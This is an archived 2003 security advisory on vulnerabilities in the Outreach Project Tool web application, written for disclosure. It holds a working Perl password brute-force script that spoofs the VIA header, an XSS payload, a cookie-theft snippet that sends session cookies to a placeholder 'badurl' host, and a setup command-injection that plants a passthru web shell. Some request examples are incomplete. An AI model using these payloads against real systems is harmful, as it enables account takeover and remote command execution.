Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps N-Z :: lnx5935.htm

Outreach Project Tool issues
20th Jan 2003 [SBWID-5935]

	Outreach Project Tool issues


	O.P.T Version opt_0.946b / Earlier versions may be vulnerable too


	In  an  advisory  by  Martin  Eiszner  []  of
	[] :
	The Outreach Project Tool was developed by CSO Lanifex GmbH  to  support
	communication with customers during  project  implementat  ion.  It  has
	rapidly evolved into a highly effective Web-based collaboration  system,
	which improves interaction between consult ants and  their  clients,  as
	well as a wide range of other applications.
	The      function      "OPT_remote_IP()"(/opt/general.php)       accepts
	"X_FORWARDED_FOR" and "VIA"- environment variables.
	This is done to identify  possible  proxy-servers.  Unfortunately  these
	variables are part of the HTTP-request headers.
	the follwoing http-request:
	GET /opt/whatever HTTP/1.1
	Host: whatever
	"$HTTP_VIA" will be used as the users IP.
	Thus leading to:
	 -Anonymous use of the application
	 -Possibility of a brute-force attack against accounts
	Simple example for a brute-force attack against OPT:
	---cut here---
	use LWP::UserAgent;
	use HTTP::Request::Common;
	use HTTP::Response;
	my ($url,$uid,$pf) = @ARGV;
	open(P,"< $pf") || die "passf.?\n";
	my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
	while(<P>){ my $pwd = $_; chomp($pwd);
	my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
	my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
	my $hds = $res->headers; my $new = $hds->header("Location");
	my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
	my $cod = $res2->code;
	my $pag = $res2->content;
	print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
	close (P);
	---cut here---
	Typical   XSS   vulnerabilities   exist    in    manny/most    of    the
	Once logged in ... goto "Notes -> News -> Ad News" Then  create  a  News
	with scripting tags included:
	---cut here---
	hello i am a news thing .. bla bla ...
	<script> alert(document.cookie); </script>
	---cut here---
	Now every user gets now an alert window with  his  own  session-id.(only
	as example!!)
	Of course it is possible to steal the OPT_Session by requesting  another
	url where a so called cookie-theft is installed !!
	(location.href or"http://badurl/theft?"+document.cookie,"a") ...)
	This vulnerability makes it possible  once  logged  in  to  steal  "any"
	other users accounts (administrator included !).
	 3) SETUP-ISSUES (/opt/setup)
	If the lockfile "lock01" in the setup_lock-directory is not removed  due
	to wrong permission settings or someone  is  able/allowed  to  create  a
	file "lock01" it is possible to:
	a) Create a new Setup
	b) Execute system-commands thru the setup.php - script.
	This is because the "temp_CRM_dir" parameter is passed directly  to  the
	PHP-exec function.
	Example GET-Request:
	---cut here---
	&action=Set up my OPT server
	---cut here---
	Above    will    create    a    script     called     "bad.php"     with
	content(<?passthru($c)?>)in the OPT-setup directory !


	After    installation    check    if    file    "lock01"    exists    in
	setup_lock-directory. if yes, remove it.
	The other vulnerabilities can only be fixed by sw-patches. (?)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH